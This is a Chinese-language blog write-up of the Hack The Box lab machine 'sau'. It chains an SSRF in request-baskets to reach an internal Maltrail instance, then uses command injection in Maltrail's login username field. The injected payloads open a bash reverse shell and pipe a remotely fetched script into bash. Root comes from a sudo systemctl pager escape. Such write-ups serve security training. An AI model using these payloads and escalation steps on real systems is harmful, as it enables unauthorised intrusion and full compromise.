<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="google-site-verification" content="JleqOUPaJdGpfRPLH4e3NfODV87Fmag6pJBPvxKQKEc"><title>[HTB]  sau | Terminal-001 | T3yT3y</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="/js/gitalk.js"></script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[HTB]  sau</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-07-13T01:27:53.496Z" id="date"> 2023-07-13</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-07-13T03:26:53.827Z" id="updated"> 2023-07-13</time></div></span><br><span>Word Count: <div class="control">2.2k</div></span><br><span>Read Time: <div class="control">10 min</div></span></div></div><hr><div id="post-content"><p class='item-img' data-src='/pic/1688875093932.jpg'><img src="/pic/1688875093932.jpg" alt="1688875093932"></p>
<span id="more"></span>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这台靶机是当前赛季最新靶机。比较考察对基本漏洞原理与利用的理解。</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ sudo nmap -p- --min-rate=10000 10.10.11.224 <br>[sudo] password <span class="hljs-keyword">for</span> kali: <br>Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 21:19 CST<br>Warning: 10.10.11.224 giving up on port because retransmission <span class="hljs-built_in">cap</span> hit (10).<br>Nmap scan report <span class="hljs-keyword">for</span> 10.10.11.224<br>Host is up (0.27s latency).<br>Not shown: 65531 closed tcp ports (reset)<br>PORT      STATE    SERVICE<br>22/tcp    open     ssh<br>80/tcp    filtered http<br>8338/tcp  filtered unknown<br>55555/tcp open     unknown<br><br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 14.17 seconds<br>                                                                                             <br>┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ sudo nmap -sV -sT -O -p22,80 10.10.11.224  <br>Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 21:19 CST<br>Nmap scan report <span class="hljs-keyword">for</span> 10.10.11.224<br>Host is up (0.26s latency).<br><br>PORT   STATE    SERVICE VERSION<br>22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)<br>80/tcp filtered http<br>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 clo<br>Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux  Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)<br>No exact OS matches <span class="hljs-keyword">for</span> host (<span class="hljs-built_in">test</span> conditions non-ideal).<br>Network Distance: 2 hops<br>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel<br><br>OS and Service detection performed. Please report any incorrect results at https://nmap.org/s<br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 14.87 seconds<br>                                                                                             <br>┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ sudo nmap --script=vuln 10.10.11.224     <br>Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 21:20 CST<br>Nmap scan report <span class="hljs-keyword">for</span> 10.10.11.224<br>Host is up (0.27s latency).<br>Not shown: 997 closed tcp ports (reset)<br>PORT      STATE    SERVICE<br>22/tcp    open     ssh<br>80/tcp    filtered http<br>55555/tcp open     unknown<br><br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 101.91 seconds<br><br></code></pre></td></tr></table></figure>

<p>nmap扫完我们发现，80端口以及不知道是啥的8338端口被filtered了，我们访问也是访问不了的，那就是只剩下55555和22端口供我们尝试了。那当然先看55555。</p>
<h3 id="nikto"><a href="#nikto" class="headerlink" title="nikto"></a>nikto</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ sudo nikto -h http://10.10.11.224:55555<br>[sudo] password <span class="hljs-keyword">for</span> kali: <br>- Nikto v2.5.0<br>---------------------------------------------------------------------------<br>+ Target IP:          10.10.11.224<br>+ Target Hostname:    10.10.11.224<br>+ Target Port:        55555<br>+ Start Time:         2023-07-13 09:27:19 (GMT8)<br>---------------------------------------------------------------------------<br>+ Server: No banner retrieved<br>+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options<br>+ /: The X-Content-Type-Options header is not <span class="hljs-built_in">set</span>. This could allow the user agent to render the content of the site <span class="hljs-keyword">in</span> a different fashion to the MIME <span class="hljs-built_in">type</span>. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/<br>+ Root page / redirects to: /web<br>+ No CGI Directories found (use <span class="hljs-string">&#x27;-C all&#x27;</span> to force check all possible <span class="hljs-built_in">dirs</span>)<br>+ OPTIONS: Allowed HTTP Methods: GET, OPTIONS .<br>+ /local/httpd<span class="hljs-variable">$map</span>.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.<br>+ /access/: This might be interesting.<br>+ /c/: This might be interesting.<br>+ /test/: This might be interesting.<br>+ /a/: May be Kebi Web Mail administration menu. See: CWE-552<br>+ 8076 requests: 0 error(s) and 8 item(s) reported on remote host<br>+ End Time:           2023-07-13 10:14:45 (GMT8) (2846 seconds)<br>---------------------------------------------------------------------------<br>+ 1 host(s) tested<br></code></pre></td></tr></table></figure>

<p>用nikto扫一下也没啥可以利用的东西，接着往下走吧。</p>
<h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>web渗透</h2><h3 id="访问网站"><a href="#访问网站" class="headerlink" title="访问网站"></a>访问网站</h3><p>扫描完了，没啥特别多的信息，先看看网页再说。</p>
<p class='item-img' data-src='/pic/assets/5210c809310173913216a10e762afb36.png'><img src="/pic/assets/5210c809310173913216a10e762afb36.png" alt="5210c809310173913216a10e762afb36"></p>
<p>我们在浏览器访问发现是一个Request Baskets页面。作用是创建一个baskets用于收集和检查HTTP请求。我们手动尝试创建了一下，发现确实他描述的那样。</p>
<p>那我们怎么利用呢？页面底部告诉了我们Request Baskets的版本号:<code>Powered by request-baskets | Version: 1.2.1</code> 。那我们就谷歌搜一下看看它存不存在什么可以利用的漏洞。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="Request-Baskets-利用"><a href="#Request-Baskets-利用" class="headerlink" title="Request Baskets 利用"></a>Request Baskets 利用</h4><h5 id="验证PoC"><a href="#验证PoC" class="headerlink" title="验证PoC"></a>验证PoC</h5><p>我们搜索一下就可以发现此版本的Request Baskets存在SSRF漏洞，而且还有上交点金手大佬**<a target="_blank" rel="noopener" href="https://github.com/b33t1e">@beet1e</a>**写的PoC。那我们就按他的PoC说明测试一下吧。</p>
<p>先利用<code>/api/baskets</code>创建一个basket，我们这里直接利用firefox的重发功能弄了，方便一点。<code>forward_url</code>填自己机子的ip做测试，看看收不收得到服务器发来的请求。</p>
<p class='item-img' data-src='/pic/assets/6b3b8d071b66db28b8141af66ddab99c.png'><img src="/pic/assets/6b3b8d071b66db28b8141af66ddab99c.png" alt="6b3b8d071b66db28b8141af66ddab99c"></p>
<p>创建完成后我们先开一个nc监听器监听。然后请求一下basket触发一下漏洞。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ curl -v http://10.10.11.224:55555/poc<br>*   Trying 10.10.11.224:55555...<br>* Connected to 10.10.11.224 (10.10.11.224) port 55555 (<span class="hljs-comment">#0)</span><br>&gt; GET /poc HTTP/1.1<br>&gt; Host: 10.10.11.224:55555<br>&gt; User-Agent: curl/7.88.1<br>&gt; Accept: */*<br>&gt; <br>&lt; HTTP/1.1 502 Bad Gateway<br>&lt; Content-Type: text/plain<br>&lt; Date: Thu, 13 Jul 2023 02:20:14 GMT<br>&lt; Content-Length: 133<br>&lt; <br>* Connection <span class="hljs-comment">#0 to host 10.10.11.224 left intact</span><br>Failed to forward request: Get http://&lt;HTB_VPN_IP&gt;:443/poc: net/http: HTTP/1.x transport connection broken: malformed HTTP response <span class="hljs-string">&quot;&quot;</span> <br></code></pre></td></tr></table></figure>

<p>我们可以发现确实触发了SSRF漏洞，我们接收到了来自服务器端的请求。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ nc -nlvp 443 <br>listening on [any] 443 ...<br>connect to [&lt;HTB_VPN_IP&gt;] from (UNKNOWN) [10.10.11.224] 33300<br>GET /poc HTTP/1.1<br>Host: &lt;HTB_VPN_IP&gt;:443<br>User-Agent: curl/7.88.1<br>Accept: */*<br>X-Do-Not-Forward: 1<br>Accept-Encoding: gzip<br></code></pre></td></tr></table></figure>

<h5 id="SSRF利用"><a href="#SSRF利用" class="headerlink" title="SSRF利用"></a>SSRF利用</h5><p>既然验证存在了SSRF漏洞，我们就要考虑一下如何利用。此处的SSRF漏洞和一般的不太一样，不带什么<code>url</code>参数可供我们读文件啥的。主要是回归SSRF的本质，通过服务器发送请求访问我们原先访问不了的东西。那么<del>首当其冲</del>的就是心心念念的80端口，由于他是filtered了，我们也不知道是被防火墙禁止外网访问还是就是关闭了，我们直接利用SSRF伪造服务器访问80端口并将结果返回给我们就知道了。</p>
<p>既然利用的思路定下来了那我们接下来改改payload就行。我们先让服务器访问80端口看看是什么情况。还是一样先利用<code>/api/baskets</code>创建baskets。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>  <span class="hljs-attr">&quot;forward_url&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;http://127.0.0.1:80/&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;proxy_response&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-literal"><span class="hljs-keyword">true</span></span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;insecure_tls&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-literal"><span class="hljs-keyword">false</span></span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;expand_path&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-literal"><span class="hljs-keyword">true</span></span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;capacity&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">250</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>然后访问刚创建的baskets。</p>
<p class='item-img' data-src='/pic/assets/1b733f925c0504e85fe40a6259671180.png'><img src="/pic/assets/1b733f925c0504e85fe40a6259671180.png" alt="1b733f925c0504e85fe40a6259671180"></p>
<p>我们发现给我们返回了80端口网页的内容。虽然很多东西都点不了，但是让我们识别到了80端口在跑的服务：<code>Maltrail v0.53</code>。这个服务又有什么说法呢？</p>
<h4 id="Maltrail-利用"><a href="#Maltrail-利用" class="headerlink" title="Maltrail 利用"></a>Maltrail 利用</h4><p>遇事不决查google，我们查一下就可以发现，版本小于0.54的Maltrail存在<a target="_blank" rel="noopener" href="https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/">未授权系统命令注入漏洞</a>。那我们可太喜欢了,这不就意味着我们可以反弹shell嘛。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ curl <span class="hljs-string">&#x27;http://10.10.11.224:55555/ssrf/login&#x27;</span> --data <span class="hljs-string">&#x27;username=;`id`&#x27;</span> <br>Login failed <br></code></pre></td></tr></table></figure>

<p>直接用给的PoC尝试一下，发现并没有命令回显，只会显示一个login failed。那这到底是能不能成功利用？不过事已至此，死马都得当活马医，本地先开一个nc监听，直接反弹shell试试。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ curl <span class="hljs-string">&#x27;http://10.10.11.224:55555/ssrf/login&#x27;</span> --data <span class="hljs-string">&#x27;username=;`/bin/bash -i &gt;&amp; /dev/tcp/&lt;HTB_VPN_IP&gt;/443 0&gt;&amp;1`&#x27;</span> <br>Login failed  <br></code></pre></td></tr></table></figure>

<p>然而本地nc并没有收到连接。那到底是哪里出了问题呢？难道是反弹shell那里因为编码或者其他问题执行失败了？那我们采用另一种不受编码影响方式反弹看看。我们把<code>/bin/bash -i &gt;&amp; /dev/tcp/&lt;HTB_VPN_IP&gt;/443 0&gt;&amp;1</code>写入一个sh文件，然后让服务器请求这个文件。当然本地得开一个简单的web服务器，用<code>python -m http.server</code>就行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ curl <span class="hljs-string">&#x27;http://10.10.11.224:55555/ssrf/login&#x27;</span>  --data <span class="hljs-string">&#x27;username=;`curl &lt;HTB_VPN_IP&gt;:8000/exp.sh|bash`&#x27;</span> <br></code></pre></td></tr></table></figure>

<p>这次，我们就收到了我们的反弹shell了。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/HTB/sau]<br>└─$ nc -nlvp 443<br>listening on [any] 443 ...<br>connect to [&lt;HTB_VPN_IP&gt;] from (UNKNOWN) [10.10.11.224] 50012<br>bash: cannot <span class="hljs-built_in">set</span> terminal process group (889): Inappropriate ioctl <span class="hljs-keyword">for</span> device<br>bash: no job control <span class="hljs-keyword">in</span> this shell<br>puma@sau:/opt/maltrail$<br></code></pre></td></tr></table></figure>

<p>puma的home目录有user flag。</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>第一步不用说了<code>sudo -l</code>。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">puma@sau:~$ sudo -l<br>sudo -l<br>Matching Defaults entries <span class="hljs-keyword">for</span> puma on sau:<br>    env_reset, mail_badpass,<br>    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin<br><br>User puma may run the following commands on sau:<br>    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service<br></code></pre></td></tr></table></figure>

<p>这次竟然有东西。惊了。而且systemctl我记得是有利用方式的来着。去<a target="_blank" rel="noopener" href="https://gtfobins.github.io/gtfobins/systemctl/">gtfobins</a>查一下果然发现有sudo权限的systemctl可以用于提权。</p>
<p>但是，这时候先别急，如果你直接按照gtfo上的方式c你会发现并进入不了编辑界面，因为此时你尚处于非交互shell。</p>
<p>所以此时第一件事，也是一种好习惯，就是先用pyhton搞一个交互性更好的shell。</p>
<p><code>python3 -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;</code></p>
<p>现在万事俱备，开造就完事。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash">puma@sau:/opt/maltrail$ sudo systemctl status trail.service<br>sudo systemctl status trail.service<br>WARNING: terminal is not fully functional<br>-  (press RETURN)!sh<br>!sshh!sh<br><span class="hljs-comment"># whoami</span><br><span class="hljs-built_in">whoami</span><br>root<br><span class="hljs-comment"># id</span><br><span class="hljs-built_in">id</span><br>uid=0(root) gid=0(root) <span class="hljs-built_in">groups</span>=0(root)<br></code></pre></td></tr></table></figure>

<p>拿下，root flag在&#x2F;root目录下就有。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这台机子主要考察对SSRF的理解，除了网上常见的教程中的SSRF的利用方式，我们还要记住SSRF本质：伪造从而让服务器发送请求，并将请求的结果返回到本机。这里搞定了其他就没啥问题了。</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/07/12/Pilgrimage/">[HTB]  Pilgrimage Prev →</a></div></div></div><div id="comments"><div class="selector"><button class="gitalk-sel"></button></div><div id="gitalk"></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">Dr.T3yT3y</a></h1><div id="description"><p>May the flame guide thee</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">2.1.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nikto"><span class="toc-number">2.2.</span> <span class="toc-text">nikto</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E6%B8%97%E9%80%8F"><span class="toc-number">3.</span> <span class="toc-text">web渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BF%E9%97%AE%E7%BD%91%E7%AB%99"><span class="toc-number">3.1.</span> <span class="toc-text">访问网站</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Request-Baskets-%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.1.</span> <span class="toc-text">Request Baskets 利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81PoC"><span class="toc-number">3.2.1.1.</span> <span class="toc-text">验证PoC</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#SSRF%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.1.2.</span> <span class="toc-text">SSRF利用</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Maltrail-%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.2.</span> <span class="toc-text">Maltrail 利用</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">4.</span> <span class="toc-text">提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">总结</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plu</a></nobr><wbr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {gitalk = new Gitalk({
 clientID: 'd746fee266fd40784c87',
 clientSecret: '18467221d189fe0e0b51bd234fcd04785a28ab09',
 repo: 'T3yT3y.github.io',
 owner: 'T3yT3y',
 admin: ['T3yT3y'],
 distractionFreeMode: false,
 id: location.pathname
});
if (document.querySelector("#gitalk")) gitalk.render("gitalk");code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>